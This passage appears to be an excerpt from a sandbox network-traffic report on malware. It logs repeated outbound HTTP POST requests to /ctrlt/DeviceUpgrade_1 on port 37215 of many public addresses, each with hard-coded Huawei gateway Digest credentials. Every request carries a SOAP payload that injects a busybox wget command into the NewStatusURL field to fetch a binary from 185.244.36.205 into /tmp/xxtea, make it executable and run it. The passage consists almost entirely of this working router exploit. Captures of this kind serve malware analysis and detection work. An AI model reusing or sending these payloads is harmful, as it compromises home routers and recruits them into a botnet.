                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              775192.168.2.154182831.152.58.23737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227489948 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              776192.168.2.1558882197.253.60.16937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227489948 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              777192.168.2.1553300102.234.104.16637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227514982 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              778192.168.2.154409645.29.9.10537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227520943 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              779192.168.2.1546556102.65.123.1637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227549076 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              780192.168.2.1555940186.30.186.3437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227602005 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              781192.168.2.1549686186.217.96.17237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227602005 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              782192.168.2.1552912190.224.106.2037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227657080 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              783192.168.2.1547894186.10.158.637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227663994 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              784192.168.2.153527431.133.17.7737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227695942 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              785192.168.2.1541054121.153.174.437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227695942 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
